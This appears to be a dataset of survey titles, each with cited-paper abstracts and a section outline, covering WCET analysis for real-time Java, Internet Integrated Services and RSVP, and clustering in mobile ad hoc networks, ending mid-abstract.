A Survey of Worst-Case Execution Time Analysis for Real-Time Java
10
--- paper_title: Real-Time Euclid: A language for reliable real-time systems paper_content: Real-Time Euclid, a language designed specifically to address reliability and guaranteed schedulability issues in real-time systems, is introduced. Real-Time Euclid uses exception handlers and import/export lists to provide comprehensive error detection, isolation, and recovery. The philosophy of the language is that every exception detectable by the hardware or the software must have an exception-handler clause associated with it. Moreover, the language definition forces every construct in the language to be time- and space-bounded. Consequently, Real-Time Euclid programs can always be analyzed for guaranteed schedulability of their processes. Thus, it is felt that Real-Time Euclid is well-suited for writing reliable real-time software. --- paper_title: The real-time specification for Java paper_content: New languages, programming disciplines, operating systems, and software engineering techniques sometimes hold considerable potential for real-time software developers. A promising area of interest-but one fairly new to the real-time community-is object-oriented programming. Java, for example, draws heavily from object orientation and is highly suitable for extension to real-time and embedded systems. Recognizing this fit between Java and real-time software development, the Real-Time for Java Experts Group (RTJEG) began developing the real-time specification for Java (RTSJ) in March 1999 under the Java Community Process. This article explains RTSJ's features and the thinking behind the specification's design. The goal of the RTJEG, of which the authors are both members, was to provide a platform-a Java execution environment and application program interface (API)-that lets programmers correctly reason about the temporal behavior of executing software. --- paper_title: Portable worst-case execution time analysis using Java Byte Code paper_content: Addresses the problem of performing worst-case execution time (WCET) analysis of Java Byte Code (JBC), which may be generated from different compilers and from different source languages. The motivation for the framework presented is to provide WCET analysis which is portable and therefore more likely to be used in an industrial context. Two issues are addressed in this paper: how to extract data flow and control flow information from JBC programs, and how to provide a compiler-/language-independent mechanism to introduce WCET annotations in the source code. We show that an annotation mechanism based on calls to a static class with empty methods result in similar code when generated by Java or Ada compilers. --- paper_title: Real-Time Euclid: A language for reliable real-time systems paper_content: Real-Time Euclid, a language designed specifically to address reliability and guaranteed schedulability issues in real-time systems, is introduced. Real-Time Euclid uses exception handlers and import/export lists to provide comprehensive error detection, isolation, and recovery. The philosophy of the language is that every exception detectable by the hardware or the software must have an exception-handler clause associated with it. Moreover, the language definition forces every construct in the language to be time- and space-bounded. Consequently, Real-Time Euclid programs can always be analyzed for guaranteed schedulability of their processes. Thus, it is felt that Real-Time Euclid is well-suited for writing reliable real-time software. --- paper_title: Portable worst-case execution time analysis using Java Byte Code paper_content: Addresses the problem of performing worst-case execution time (WCET) analysis of Java Byte Code (JBC), which may be generated from different compilers and from different source languages. The motivation for the framework presented is to provide WCET analysis which is portable and therefore more likely to be used in an industrial context. Two issues are addressed in this paper: how to extract data flow and control flow information from JBC programs, and how to provide a compiler-/language-independent mechanism to introduce WCET annotations in the source code. We show that an annotation mechanism based on calls to a static class with empty methods result in similar code when generated by Java or Ada compilers. --- paper_title: Asynchronous Transfer of Control in the RTSJ-compliant Java Processor paper_content: Asynchronous Transfer of Control (ATC) is a crucial mechanism for real-time applications, and is currently provided in the Real-Time Specification for Java (RTSJ). This paper proposes a framework to implement ATC in the RTSJ-compliant Java processor based on the instruction optimization method proposed in our previous work [1]. Because most of the processing is done before bytecode execution in this method, the implementation using our framework is straightforward. Moreover, its Worst Case Execution Time (WCET) is more predictable. --- paper_title: Real-time objects on the bare metal: an efficient hardware realization of the Java/sup TM/ Virtual Machine paper_content: Combining the design-time efficiency of object oriented development with the runtime efficiency of direct hardware support for object oriented execution, aJile Systems has developed a low-power hardware implementation of the Java Virtual Machine for real time and embedded applications. AJile's hardware provides direct support for the entire JVM instruction set and thread model, obviating the need for a Java interpreter or Just-in-Time (JIT) compiler, as well as the traditional Real-Time Operating System (RTOS). AJile's hardware technology also supports multiple JVM contexts executing on the same CPU, enhancing safety and security by guaranteeing space and time allotments for multiple Java applications. Combined with a Java 2 Micro Edition (J2ME) runtime and a back-end target build tool, these technologies constitute an efficient platform for the development of real time embedded applications entirely in Java. --- paper_title: The real-time specification for Java paper_content: New languages, programming disciplines, operating systems, and software engineering techniques sometimes hold considerable potential for real-time software developers. A promising area of interest-but one fairly new to the real-time community-is object-oriented programming. Java, for example, draws heavily from object orientation and is highly suitable for extension to real-time and embedded systems. Recognizing this fit between Java and real-time software development, the Real-Time for Java Experts Group (RTJEG) began developing the real-time specification for Java (RTSJ) in March 1999 under the Java Community Process. This article explains RTSJ's features and the thinking behind the specification's design. The goal of the RTJEG, of which the authors are both members, was to provide a platform-a Java execution environment and application program interface (API)-that lets programmers correctly reason about the temporal behavior of executing software. --- paper_title: Gain time reclaiming in high performance real-time Java systems paper_content: The run-time characteristics of Java, such as high frequency of method invocation, dynamic dispatching and dynamic loading, make Java more difficult than other object-oriented programming languages, such as C++, for conducting Worst-Case Execution Time (WCET) analysis. To offer a more flexible way to develop object-oriented real-time applications in the realtime Java environment without loss of predictability and performance, we propose a novel gain time reclaiming framework integrated with WCET analysis. This paper demonstrates how to improve the utilisation and performance of the whole system by reclaiming gain time at run-time. Our approach shows that integrating WCET with gain time reclaiming can not only provide a more flexible environment, but it also does not necessarily result in unsafe or unpredictable timing behaviour. --- paper_title: Low-level analysis of a portable Java byte code WCET analysis framework paper_content: To support portability, worst-case execution time (WCET) analysis of Java byte code is performed at two levels - machine-independent program flow analysis at a higher level and machine-dependent timing analysis of individual program constructs at a lower level. This paper contributes a WCET analysis that computes worst-case execution frequencies of Java byte codes within the software being analysed and accounts for platform-dependent information, i.e. the processor's pipeline. The main part of the approach is platform-independent; only a limited analysis is needed on a per-platform basis. --- paper_title: XRTJ: An Extensible Distributed High-Integrity Real-Time Java Environment paper_content: Despite Java’s initial promise of providing a reliable and cost-effective platform-independent environment, the language appears to be unfavourable in the area of high-integrity systems and real-time systems. To encourage the use of Java in the development of distributed high-integrity real-time systems, the language environment must provide not only a well-defined specification or subset, but also a complete environment with appropriate analysis tools. We propose an extensible distributed high-integrity real-time Java environment, called XRTJ, that supports three attributes, i.e., predictable programming model, dependable static analysis environment, and reliable distributed run-time environment. The goal of this paper is to present an overview of our on-going project and report on its current status. We also raise some important issues in the area of distributed high-integrity systems, and present how we can deal with them by defining two distributed run-time models where safe and timely operations will be supported. --- paper_title: WCET analysis of reusable portable code paper_content: Traditional worst-case execution-time analysis (WCET analysis) computes upper bounds for the execution times of code. This analysis uses knowledge about the execution contest of the code and about the target architecture. In contrast, the WCET analysis for reusable and portable code has to abstract from parameters that are unknown until the code is finally used. The analysis is done in two steps. The first step computes abstract WCET information to support the reuse and portability of the WCET information. The second step uses the abstract WCET information to compute concrete WCET bounds when the application context and the timing parameters of the target system are known. The paper describes each of the two analysis steps. It demonstrates how WCET information can be made portable and reusable. --- paper_title: HIDOORS - a high integrity distributed deterministic Java environment paper_content: This paper presents the design of HIDOORS, an integrated development environment suitable for embedded distributed real-time systems, based on the Java programming language. HIDOORS will cover all the life-cycle of real-time software development with extensions to existing tools (UML modeling, Java compiler Java Virtual Machine, and a worst case execution time analysis tool) that will all be integrated into a single integrated development environment. The system will also assist the developer in distributing the application, by providing faster RMI and a distributed event manager that provides strict timing guarantees. This paper is written at the beginning of HIDOORS development, and as such, it presents only, the defined objectives and the early, architecture of the system; further developments will be the Subject of future works. --- paper_title: WCET analysis for a Java processor paper_content: In this paper we propose a solution for a worst-case execution time (WCET) analyzable Java system: a combination of a time predictable Java processor and a tool that performs WCET analysis of Java bytecode. We present a Java processor, called JOP, designed for time-predictable execution of real-time tasks. JOP is an implementation of the Java virtual machine (JVM) in hardware. The execution time of bytecodes, the instructions of the JVM, is known cycle accurate for JOP. Therefore, JOP simplifies the low-level WCET analysis. A method cache, that fills whole Java methods into the cache, is analyzable with respect to the WCET. The WCET analysis tool is based on integer linear programming. The tool performs the low-level analysis at the bytecode level and integrates the method cache analysis for a two block cache. --- paper_title: Portable worst-case execution time analysis using Java Byte Code paper_content: Addresses the problem of performing worst-case execution time (WCET) analysis of Java Byte Code (JBC), which may be generated from different compilers and from different source languages. The motivation for the framework presented is to provide WCET analysis which is portable and therefore more likely to be used in an industrial context. Two issues are addressed in this paper: how to extract data flow and control flow information from JBC programs, and how to provide a compiler-/language-independent mechanism to introduce WCET annotations in the source code. We show that an annotation mechanism based on calls to a static class with empty methods result in similar code when generated by Java or Ada compilers. --- paper_title: Hard real-time garbage collection in the Jamaica virtual machine paper_content: Java's automatic memory management is the main reason that prevents Java from being used in hard real-time environments. We present the garbage collection mechanism that is used by the Jamaica Virtual Machine, an implementation of the Java Virtual Machine Specification. This mechanism differs significantly from existing implementations in the way threads are implemented, root references are found and in the object layout that is used. The implementation provides hard real-time guarantees while it allows unrestricted use of the Java language. Even dynamic allocation of normal garbage collected Java objects is possible with hard real-time guarantees. --- paper_title: An interactive environment for real-time software development paper_content: Object-oriented languages, in particular Java, are beginning to make their way into embedded real-time software development. This is not only for the safety and expressiveness of the source language; the mobility and dynamic loading of Java bytecode make it particularly useful in embedded real-time systems. However using such languages in real-time systems makes it more difficult to predict the worst-case execution time of tasks. Such predictions are necessary for predictable task scheduling in the developed system. Garbage collection, common in object-oriented languages, must be considered; to schedule garbage collection safely, we must know how much memory it has to handle. Dynamic binding in conjunction with dynamic loading of code also needs treatment. We show how techniques for predicting time and memory demands of object-oriented programs are integrated into the Skanerost development environment. The environment explicitly targets an iterative development process, which is particularly important in real-time software development since time and memory demands cannot be determined until the code is written. Design changes due to timing problems become more costly as development progresses, and Skanerost allows such problems to be detected early. --- paper_title: ANALYZING EXECUTION-TIME OF OBJECT-ORIENTED PROGRAMS USING ABSTRACT INTERPRETATION paper_content: As a result of the industrial deployment of real-time systems, there is an increasing demandfor methods to perform safe and tight calculation of the worst case execution time (WCET) ofprograms. The ... --- paper_title: An effective instruction optimization method for embedded real-time Java processor paper_content: A method to optimize instructions in embedded real-time Java processors is proposed. It can reduce the CPI (cycles per instruction) and simplify the implementation of complex instructions, as well as make the WCET (worst case execution time) of the optimized instructions more predictable. Because this method optimizes instruction itself it can be used together with other architectural optimization methods such as pipeline or out-of-order execution etc. --- paper_title: Addressing dynamic dispatching issues in WCET analysis for object-oriented hard real-time systems paper_content: There is a trend towards using object-oriented programming languages to develop hard real-time applications. However some object-oriented features, such as dynamic dispatching and dynamic loading, are prohibited from being used in hard realtime systems because they are either unpredictable and/or un-analysable. Arguably, these restrictions could make applications very limited and unrealistic since they could eliminate the major advantages of object-oriented programming. This paper demonstrates how we can address the dynamic dispatching issues in Worst-Case Execution Timing (WCET) analysis with minimum annotations. The major contributions include: discussing the major issues involved in using and restricting dynamic binding features; weakening the restriction of using dynamic dispatching; presenting how to estimate tighter and safer WCET value in object-oriented hard real-time systems. Our approach shows that allowing the use of dynamic dispatching can not only provide a more flexible way to develop object-oriented hard real-time applications, but also does not necessarily result in unpredictable timing analysis. --- paper_title: Addressing dynamic dispatching issues in WCET analysis for object-oriented hard real-time systems paper_content: There is a trend towards using object-oriented programming languages to develop hard real-time applications. However some object-oriented features, such as dynamic dispatching and dynamic loading, are prohibited from being used in hard realtime systems because they are either unpredictable and/or un-analysable. Arguably, these restrictions could make applications very limited and unrealistic since they could eliminate the major advantages of object-oriented programming. This paper demonstrates how we can address the dynamic dispatching issues in Worst-Case Execution Timing (WCET) analysis with minimum annotations. The major contributions include: discussing the major issues involved in using and restricting dynamic binding features; weakening the restriction of using dynamic dispatching; presenting how to estimate tighter and safer WCET value in object-oriented hard real-time systems. Our approach shows that allowing the use of dynamic dispatching can not only provide a more flexible way to develop object-oriented hard real-time applications, but also does not necessarily result in unpredictable timing analysis. ---
Title: A Survey of Worst-Case Execution Time Analysis for Real-Time Java Section 1: Introduction Description 1: This section introduces the importance of worst-case execution time (WCET) analysis in real-time systems and the current challenges faced by practitioners in the industry. Section 2: The Challenge of WCET Analysis Description 2: This section discusses why influential research on WCET analysis hasn't been widely adopted, including the complexities of modern CPU architectures. Section 3: Implementation Difficulties Description 3: This section provides details on the difficulties in implementing WCET analysis tools, highlighting issues at both hardware and software levels. Section 4: Java as a Catalyst Description 4: This section explains why Java has become a popular platform for real-time systems and outlines key events and innovations that have made real-time Java viable. Section 5: Bytecode as an Intermediate Representation Description 5: This section covers the proposal to use Java bytecode as an intermediate representation for WCET tools and discusses the challenges and initial research in this area. Section 6: High-level Analysis for the Java Language Description 6: This section examines research into high-level WCET analysis for Java, including techniques and tools that extend traditional compiler theory to Java. Section 7: Low-level WCET Analysis for Java Bytecode Description 7: This section delves into approaches for low-level WCET analysis of Java bytecode, focusing on frameworks that address bytecode portability and timing models. Section 8: WCET Analysis for Java-specific Processors Description 8: This section explores processor architectures designed specifically for real-time systems, such as the Java Optimized Processor (JOP), and their implications for WCET analysis. Section 9: Other Work in WCET Analysis for Java Description 9: This section presents additional work in WCET analysis for Java that does not fall into the main categories, including development environments and optimization frameworks. Section 10: Conclusion Description 10: This section summarizes the state of WCET analysis for Java, including open problems and future directions for research.
Integrated Services in the Internet Architecture: an Overview
15
--- paper_title: RSVP: a new resource ReSerVation Protocol paper_content: A resource reservation protocol (RSVP), a flexible and scalable receiver-oriented simplex protocol, is described. RSVP provides receiver-initiated reservations to accommodate heterogeneity among receivers as well as dynamic membership changes; separates the filters from the reservation, thus allowing channel changing behavior; supports a dynamic and robust multipoint-to-multipoint communication model by taking a soft-state approach in maintaining resource reservations; and decouples the reservation and routing functions. A simple network configuration with five hosts connected by seven point-to-point links and three switches is presented to illustrate how RSVP works. Related work and unresolved issues are discussed. > --- paper_title: Supporting real-time applications in an Integrated Services Packet Network: architecture and mechanism paper_content: This paper considers the support of real-time applications in an Integrated Services Packet Network (ISPN). We first review the characteristics of real-time applications. We observe that, contrary to the popular view that real-time applications necessarily require a fixed delay bound, some real-time applications are more flexible and can adapt to current network conditions. We then propose an ISPN architecture that supports two distinct kinds of real-time service: guaranteed service, which is the traditional form of real-time service discussed in most of the literature and involves pre-computed worst-case delay bounds, and predicted service which uses the measure performance of the network in computing delay bounds. We then propose a packet scheduling mechanism that can support both of these real-time services as well as accommodate datagram traffic. We also discuss two other aspects of an overall ISPN architecture: the service interface and the admission control criteria. --- paper_title: A Protocol for Packet Network Intercommunication paper_content: A protocol that supports the sharing of resources that exist in different packet switching networks is presented. The protocol provides for variation in individual network packet sizes, transmission failures, sequencing, flow control, end-to-end error checking, and the creation and destruction of logical process-to-process connections. Some implementation issues are considered, and problems such as internetwork routing, accounting, and timeouts are exposed. --- paper_title: The design philosophy of the DARPA Internet Protocols paper_content: The Internet protocol suite, TCP/IP, was first proposed fifteen years ago. It was developed by the Defense Advanced Research Projects Agency (DARPA), and has been used widely in military and commercial systems. While there have been papers and specifications that describe how the protocols work, it is sometimes difficult to deduce from these why the protocol is as it is. For example, the Internet protocol is based on a connectionless or datagram mode of service. The motivation for this has been greatly misunderstood. This paper attempts to capture some of the early reasoning which shaped the Internet protocols. --- paper_title: A Proposed Flow Specification paper_content: A flow specification (or "flow spec") is a data structure used by internetwork hosts to request special services of the internetwork, often guarantees about how the internetwork will handle some of the hosts' traffic. In the future, hosts are expected to have to request such services on behalf of distributed applications such as multimedia conferencing. --- paper_title: RSVP: a new resource ReSerVation Protocol paper_content: A resource reservation protocol (RSVP), a flexible and scalable receiver-oriented simplex protocol, is described. RSVP provides receiver-initiated reservations to accommodate heterogeneity among receivers as well as dynamic membership changes; separates the filters from the reservation, thus allowing channel changing behavior; supports a dynamic and robust multipoint-to-multipoint communication model by taking a soft-state approach in maintaining resource reservations; and decouples the reservation and routing functions. A simple network configuration with five hosts connected by seven point-to-point links and three switches is presented to illustrate how RSVP works. Related work and unresolved issues are discussed. > --- paper_title: Analysis and simulation of a fair queueing algorithm paper_content: We discuss gateway queueing algorithms and their role in controlling congestion in datagram networks. A fair queueing algorithm, based on an earlier suggestion by Nagle, is proposed. Analysis and simulations are used to compare this algorithm to other congestion control schemes. We find that fair queueing provides several important advantages over the usual first-come-first-serve queueing algorithm: fair allocation of bandwidth, lower delay for sources using less than their full share of bandwidth, and protection from ill-behaved sources. --- paper_title: A Scheme for Real-Time Channel Establishment in Wide-Area Networks paper_content: Multimedia communication involving digital audio and/or digital video has rather strict delay requirements. A real-time channel is defined as a simplex connection between a source and a destination characterized by parameters representing the performance requirements of the client. A study is made of the feasibility of providing real-time services on a packet-switched store-and-forward wide-area network with general topology. A description is given of a scheme for the establishment of channels with deterministic or statistical delay bounds, and the results of the simulation experiments run to evaluate it are presented. The results are judged encouraging: the approach satisfies the guarantees even in worst case situations, uses the network's resources to a fair extent, and efficiently handles channels with a variety of offered load and burstiness characteristics. Also, the packet transmission overhead is quite low, and the channel establishment overhead is small enough to be acceptable in most practical cases. > --- paper_title: RSVP: a new resource ReSerVation Protocol paper_content: A resource reservation protocol (RSVP), a flexible and scalable receiver-oriented simplex protocol, is described. RSVP provides receiver-initiated reservations to accommodate heterogeneity among receivers as well as dynamic membership changes; separates the filters from the reservation, thus allowing channel changing behavior; supports a dynamic and robust multipoint-to-multipoint communication model by taking a soft-state approach in maintaining resource reservations; and decouples the reservation and routing functions. A simple network configuration with five hosts connected by seven point-to-point links and three switches is presented to illustrate how RSVP works. Related work and unresolved issues are discussed. > --- paper_title: The design philosophy of the DARPA Internet Protocols paper_content: The Internet protocol suite, TCP/IP, was first proposed fifteen years ago. It was developed by the Defense Advanced Research Projects Agency (DARPA), and has been used widely in military and commercial systems. While there have been papers and specifications that describe how the protocols work, it is sometimes difficult to deduce from these why the protocol is as it is. For example, the Internet protocol is based on a connectionless or datagram mode of service. The motivation for this has been greatly misunderstood. This paper attempts to capture some of the early reasoning which shaped the Internet protocols. --- paper_title: The design philosophy of the DARPA Internet Protocols paper_content: The Internet protocol suite, TCP/IP, was first proposed fifteen years ago. It was developed by the Defense Advanced Research Projects Agency (DARPA), and has been used widely in military and commercial systems. While there have been papers and specifications that describe how the protocols work, it is sometimes difficult to deduce from these why the protocol is as it is. For example, the Internet protocol is based on a connectionless or datagram mode of service. The motivation for this has been greatly misunderstood. This paper attempts to capture some of the early reasoning which shaped the Internet protocols. ---
Title: Integrated Services in the Internet Architecture: an Overview Section 1: Introduction Description 1: Introduce the background of integrated services and the motivation for adapting Internet architecture to support real-time QoS. Section 2: Elements of the Architecture Description 2: Discuss the fundamental changes proposed to the Internet model to support integrated services, including the extended service model and reference implementation framework. Section 3: Integrated Services Model Description 3: Describe the IS model, including the types of services it offers, key assumptions, and the requirements for service commitments. Section 4: Reference Implementation Framework Description 4: Provide details about the proposed framework for implementing the IS model, including components like the packet scheduler, admission control, classifier, and reservation setup protocol. Section 5: Quality of Service Requirements Description 5: Explain the QoS requirements for different types of applications, focusing on the time-of-delivery of packets and the distinction between real-time and elastic applications. Section 6: Resource-Sharing Requirements and Service Models Description 6: Discuss the policy issues and service models for resource-sharing among multiple traffic classes and administrative entities, emphasizing the hierarchical link-sharing model. Section 7: Packet Dropping Description 7: Explore the concept of controlled packet dropping to manage QoS commitments, including preemptable and expendable packets. Section 8: Usage Feedback Description 8: Address the importance of usage feedback (accounting) mechanisms to prevent abuse of network resources. Section 9: Reservation Model Description 9: Describe the reservation model for negotiating QoS levels and the complexities involved in realistic scenarios. Section 10: Traffic Control Mechanisms Description 10: Provide an overview of the traffic control mechanisms available for packet scheduling, packet dropping, packet classification, and admission control. Section 11: Applying the Mechanisms Description 11: Detail how the aforementioned traffic control mechanisms can be applied to support the proposed services, with an example of the CSZ scheme. Section 12: Reservation Setup Protocol Description 12: Discuss the design and requirements of a reservation setup protocol in a multicast environment, introducing the RSVP protocol. Section 13: RSVP Overview Description 13: Give an overview of the RSVP protocol, including its approach to creating and maintaining distributed reservation states and its different reservation styles. Section 14: Soft State Description 14: Compare the hard state and soft state approaches to reservation setup and justify the choice of the soft state for RSVP. Section 15: Routing and Reservations Description 15: Examine the interaction between routing and reservation setup, addressing issues like route discovery, load-dependent routing, and route adaptation.
Survey of Clustering Schemes in Mobile Ad hoc Networks
12
--- paper_title: Scalable Routing Protocols for Mobile Ad Hoc Networks paper_content: The growing interest in mobile ad hoc network techniques has resulted in many routing protocol proposals. Scalability issues in ad hoc networks are attracting increasing attention these days. We survey the routing protocols that address scalability. The routing protocols included in the survey fall into three categories: flat routing protocols; hierarchical routing approaches; GPS augmented geographical routing schemes. The article compares the scalability properties and operational features of the protocols and discusses challenges in future routing protocol designs. --- paper_title: An Efficient Cluster-Based Routing Algorithm in Ad Hoc Networks with Unidirectional Links * paper_content: Mobile ad hoc networks are dynamically organized by a collection of wireless mobile nodes. The mobile nodes in ad hoc networks can move arbitrarily thus the topology of network changes dynamically. Due to the properties of communication medium in wireless networks, unidirectional links may exist between mobile nodes thus results in the difficulty of link utilization and routing. In this paper, we take the advantages of multi-hop acknowledgement and employ the clustering technique to design an efficient hybrid routing protocol in ad hoc networks with unidirectional links. Simulation results demonstrate the stability and efficiency of the proposed protocol. --- paper_title: Max-min d-cluster formation in wireless ad hoc networks paper_content: An ad hoc network may be logically represented as a set of clusters. The clusterheads form a d-hop dominating set. Each node is at most d hops from a clusterhead. Clusterheads form a virtual backbone and may be used to route packets for nodes in their cluster. Previous heuristics restricted themselves to 1-hop clusters. We show that the minimum d-hop dominating set problem is NP-complete. Then we present a heuristic to form d-clusters in a wireless ad hoc network. Nodes are assumed to have a non-deterministic mobility pattern. Clusters are formed by diffusing node identities along the wireless links. When the heuristic terminates, a node either becomes a clusterhead, or is at most d wireless hops away from its clusterhead. The value of d is a parameter of the heuristic. The heuristic can be run either at regular intervals, or whenever the network configuration changes. One of the features of the heuristic is that it tends to re-elect existing clusterheads even when the network configuration changes. This helps to reduce the communication overheads during transition from old clusterheads to new clusterheads. Also, there is a tendency to evenly distribute the mobile nodes among the clusterheads, and evently distribute the responsibility of acting as clusterheads among all nodes. Thus, the heuristic is fair and stable. Simulation experiments demonstrate that the proposed heuristic is better than the two earlier heuristics, namely the LCA and degree-based solutions. --- paper_title: Issues in scalable clustered network architecture for mobile ad hoc networks paper_content: As a large-scale, high-density multi-hop network becomes desirable in many applications, there exists a greater demand for scalable mobile ad hoc network (MANET) architecture. Due to the increased route length between two end nodes in a multi-hop MANET, the challenge is in the limited scalability despite the improved spatial diversity in a large network area. Common to most of existing approaches for a scalable MANET is the link cluster architecture (LCA), where mobile nodes are logically partitioned into groups, called clusters. Clustering algorithms select master nodes and maintain the cluster structure dynamically as nodes move. Routing protocols utilize the underlying cluster structure to maintain routing and location information in an efficient manner. This paper discusses the various issues in scalable clustered network architectures for MANETs. This includes a classification of link-clustered architectures, an overview of clustering algorithms focusing on master selection, and a survey of cluster-based routing protocols. --- paper_title: A survey of clustering schemes for mobile ad hoc networks paper_content: Clustering is an important research topic for mobile ad hoc networks (MANETs) because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. A large variety of approaches for ad hoc clustering have been presented, whereby different approaches typically focus on different performance metrics. This article presents a comprehensive survey of recently proposed clustering algorithms, which we classify based on their objectives. This survey provides descriptions of the mechanisms, evaluations of their performance and cost, and discussions of advantages and disadvantages of each clustering scheme. With this article, readers can have a more thorough and delicate understanding of ad hoc clustering and the research trends in this area. --- paper_title: A survey on clustering algorithms for wireless sensor networks paper_content: The past few years have witnessed increased interest in the potential use of wireless sensor networks (WSNs) in applications such as disaster management, combat field reconnaissance, border protection and security surveillance. Sensors in these applications are expected to be remotely deployed in large numbers and to operate autonomously in unattended environments. To support scalability, nodes are often grouped into disjoint and mostly non-overlapping clusters. In this paper, we present a taxonomy and general classification of published clustering schemes. We survey different clustering algorithms for WSNs; highlighting their objectives, features, complexity, etc. We also compare of these clustering algorithms based on metrics such as convergence rate, cluster stability, cluster overlapping, location-awareness and support for node mobility. --- paper_title: Survey of clustering algorithms for MANET paper_content: Many clustering schemes have been proposed for ad hoc networks. A systematic classification of these clustering schemes enables one to better understand and make improvements. In mobile ad hoc networks, the movement of the network nodes may quickly change the topology resulting in the increase of the overhead message in topology maintenance. Protocols try to keep the number of nodes in a cluster around a pre-defined threshold to facilitate the optimal operation of the medium access control protocol. The clusterhead election is invoked on-demand, and is aimed to reduce the computation and communication costs. A large variety of approaches for ad hoc clustering have been developed by researchers which focus on different performance metrics. This paper presents a survey of different clustering schemes. --- paper_title: A Survey on One-Hop Clustering Algorithms in Mobile Ad Hoc Networks paper_content: Clustering in mobile ad hoc network (MANET) play a vital role in improving its basic network performance parameters like routing delay, bandwidth consumption and throughput. One-hop clustering scheme adopts the simple mechanism to make the logical partition of the dynamic network where the network topology changes constantly resulting an unstable clustering. This paper makes a comprehensive survey of some bench-mark one-hop clustering algorithms to understand the research trends in this area. The literature provides the logic of cluster formation for different algorithms in achieving a linked cluster architecture and an intensive simulation survey of their performance on the cluster maintenance aspects such as cluster density, frequency of cluster reelection, frequency of cluster changes by the nodes and the granularity of cluster heads. This paper should facilitate the researchers as well as practitioners in choosing a suitable clustering algorithm on the basis of their formation and maintenance overhead, before any routing scheme is adopted in the mobile ad hoc network. --- paper_title: A Distributed Weighted Cluster Based Routing Protocol for MANETs paper_content: MANETs or Mobile ad-hoc networks are a form of wireless networks which do not require a base station for providing network connectivity. Mobile ad-hoc networks have many characteristics which distinguish them from other wireless networks which makes routing in mobile ad-hoc networks a challenging task. Cluster based routing scheme is one of the routing schemes for MANETs in which various clusters of mobile nodes are formed with each cluster having its own clusterhead which are responsible for routing between clusters. In this project we have designed an implementation of Distributed Weighted Clustering Algorithm. This approach is based on combined weight metric that takes into account several system parameters like the node degree, transmission range, energy and mobility of the nodes. After implementation we have evaluated the performance of our cluster based routing scheme in various network situations. --- paper_title: A design concept for reliable mobile radio networks with frequency hopping signaling paper_content: The design of a packet radio network must reflect the operational requirements and environmental constraints to which it is subject. In this paper, we outline those features that distinguish the High Frequency (HF) Intra Task Force (ITF) Network from other packet radio networks, and we present a design concept for this network that encompasses organizational structure, waveform design, and channel access. Network survivability is achieved through the use of distributed network control and frequency hopping spread-spectrum signaling. We demonstrate how the execution of the fully distributed Linked Cluster Algorithm can enable a network to reconfigure itself when it is affected by connectivity changes such as those resulting from jamming. Additional resistance against jamming is provided by frequency hopping, which leads naturally to the use of code division mutiple access (CDMA) techniques that permit the simultaneous successful transmission by several users. Distributed algorithms that exploit CDMA properties have been developed to schedule contention-free transmissions for much of the channel access in this network. Contention-based channel access protocols can also be implemented in conjunction with the Linked Cluster network structure. The design concept presented in this paper provides a high degree of survivability and flexibility, to accommodate changing environmental conditions and user demands. --- paper_title: WCA: A Weighted Clustering Algorithm for Mobile Ad Hoc Networks paper_content: In this paper, we propose an on-demand distributed clustering algorithm for multi-hop packet radio networks. These types of networks, also known as i>ad hoc networks, are dynamic in nature due to the mobility of nodes. The association and dissociation of nodes to and from i>clusters perturb the stability of the network topology, and hence a reconfiguration of the system is often unavoidable. However, it is vital to keep the topology stable as long as possible. The i>clusterheads, form a i>dominant set in the network, determine the topology and its stability. The proposed weight-based distributed clustering algorithm takes into consideration the ideal degree, transmission power, mobility, and battery power of mobile nodes. The time required to identify the clusterheads depends on the diameter of the underlying graph. We try to keep the number of nodes in a cluster around a pre-defined threshold to facilitate the optimal operation of the medium access control (MAC) protocol. The non-periodic procedure for clusterhead election is invoked on-demand, and is aimed to reduce the computation and communication costs. The clusterheads, operating in “dual" power mode, connects the clusters which help in routing messages from a node to any other node. We observe a trade-off between the uniformity of the load handled by the clusterheads and the connectivity of the network. Simulation experiments are conducted to evaluate the performance of our algorithm in terms of the number of clusterheads, i>reaffiliation frequency, and dominant set updates. Results show that our algorithm performs better than existing ones and is also tunable to different kinds of network conditions. --- paper_title: Distributed clustering for ad hoc networks paper_content: A Distributed Clustering Algorithm (DCA) and a Distributed Mobility-Adaptive Clustering (DMAC) algorithm are presented that partition the nodes of a fully mobile network: (ad hoc network) into clusters, this giving the network a hierarchical organization. Nodes are grouped by following a new weight-based criterion that allows the choice of the nodes that coordinate the clustering process based on node mobility-rebated parameters. The DCA is suitable for clustering "quasistatic" ad hoc networks. It is easy to implement and its time complexity is proven to be bounded by a network parameter that depends on the topology of the network rather than on its size, i.e., the invariant number of the network nodes. The DMAC algorithm adapts to the changes in the network topology due to the mobility of the nodes, and it is thus suitable for any mobile environment. Both algorithms are executed at each node with the sole knowledge of the identity of the one hop neighbors, and induce on the network the same clustering structure. --- paper_title: A Distributed Weighted Clustering Algorithm for Mobile Ad Hoc Networks paper_content: Clustering has been proven to support quality of services effectively in a multi-hop network. In order to achieve good performance in a mobile ad hoc network whose topology changes dynamically, any clustering algorithm should operate with minimum clustering maintenance overhead and preserve current cluster structure as much as possible. In this paper, we propose a clustering algorithm, namely a distributed weighted clustering algorithm. The goals of the algorithm are maintaining stable clustering structure, minimizing the overhead for the clustering set up and maintenance, maximizing lifespan of mobile nodes in the system, and achieving good end-to-end performance. DWCA chooses locally optimal clusterheads and incorporates power management at the clusterheads. Results obtained from simulations proved that the proposed algorithm achieves the goals. --- paper_title: A survey of clustering schemes for mobile ad hoc networks paper_content: Clustering is an important research topic for mobile ad hoc networks (MANETs) because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. A large variety of approaches for ad hoc clustering have been presented, whereby different approaches typically focus on different performance metrics. This article presents a comprehensive survey of recently proposed clustering algorithms, which we classify based on their objectives. This survey provides descriptions of the mechanisms, evaluations of their performance and cost, and discussions of advantages and disadvantages of each clustering scheme. With this article, readers can have a more thorough and delicate understanding of ad hoc clustering and the research trends in this area. --- paper_title: A survey on clustering algorithms for wireless sensor networks paper_content: The past few years have witnessed increased interest in the potential use of wireless sensor networks (WSNs) in applications such as disaster management, combat field reconnaissance, border protection and security surveillance. Sensors in these applications are expected to be remotely deployed in large numbers and to operate autonomously in unattended environments. To support scalability, nodes are often grouped into disjoint and mostly non-overlapping clusters. In this paper, we present a taxonomy and general classification of published clustering schemes. We survey different clustering algorithms for WSNs; highlighting their objectives, features, complexity, etc. We also compare of these clustering algorithms based on metrics such as convergence rate, cluster stability, cluster overlapping, location-awareness and support for node mobility. --- paper_title: Survey of clustering algorithms for MANET paper_content: Many 